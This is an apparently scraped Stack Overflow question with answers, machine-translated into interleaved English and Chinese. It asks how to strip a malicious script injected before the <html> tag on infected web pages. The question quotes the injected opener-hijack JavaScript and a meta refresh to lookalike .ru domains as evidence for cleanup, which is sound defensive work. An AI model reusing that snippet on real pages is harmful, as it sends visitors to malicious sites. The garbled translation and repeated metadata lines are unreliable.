怎么能在之前更换一切 <html> 用Perl命令标记？

Question

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag on a whole mess of files. 我管理的网络服务器上的文件夹最近被感染了，并且在一堆乱七八糟的文件上打开了一个恶意脚本，打开了<html>标签。 I'm trying to execute a perl string replace script to clean it out. 我正在尝试执行perl字符串替换脚本来清除它。

The malicious files look something like this: 恶意文件看起来像这样：

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace. 我和Regex混淆了，我试图从其他StackOverflow帖子中尽可能多地收集有关如何使用perl的字符串替换的信息。 The biggest issue I'm running into is making it work over multiple lines. 我遇到的最大问题是让它在多行上运行。

Here's what I have so far: 这是我到目前为止所拥有的：

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html

This seems to have no effect. 这似乎没有效果。 If I change the second <html> to <foobar> it correctly replaces with foobar, but it ignores everything in front of it. 如果我将第二个<html>更改为<foobar>它会正确地替换为foobar，但它会忽略前面的所有内容。

From what I can tell, the -0777 flag is supposed to "slurp" as one line, and the \\s* should match the entire string before <html> , but again, my regex is lacking. 据我所知， -0777标志应该“ -0777 ”为一行，并且\\s*应该在<html>之前匹配整个字符串，但同样，我的正则表达式缺乏。 Any help is greatly appreciated! 任何帮助是极大的赞赏！

Answer 1

Try this: 尝试这个：

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this more safer and effective pattern: 或者这种更安全有效的模式：

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

Answer 2

\\s* is too specific. \\ s *太具体了。 You don't only want to match whitespace before the . 你不仅希望在之前匹配空格。 Try .* which matches everything before the 尝试。*匹配之前的所有内容

Answer 3

\\s* should be [\\s\\S]* so it matches all characters. \\s*应该是[\\s\\S]*所以它匹配所有字符。

I found this as a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html 我发现这是一个很好的参考： http ： //www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is: 所以最后的工作命令是：

perl -0777 -i -pe 's/[\\s\\S]*<html>/<html>/s' index.html

怎么能在之前更换一切 <html> 用Perl命令标记？

问题描述

3 个解决方案

解决方案1
2 2013-07-13 01:56:02

解决方案2
1 2013-07-13 01:37:12

解决方案3
0 已采纳 2013-07-13 01:43:55

怎么能在之前更换一切 <html> 用Perl命令标记？

问题描述

3 个解决方案

解决方案1 2 2013-07-13 01:56:02

解决方案2 1 2013-07-13 01:37:12

解决方案3 0 已采纳 2013-07-13 01:43:55

解决方案1
2 2013-07-13 01:56:02

解决方案2
1 2013-07-13 01:37:12

解决方案3
0 已采纳 2013-07-13 01:43:55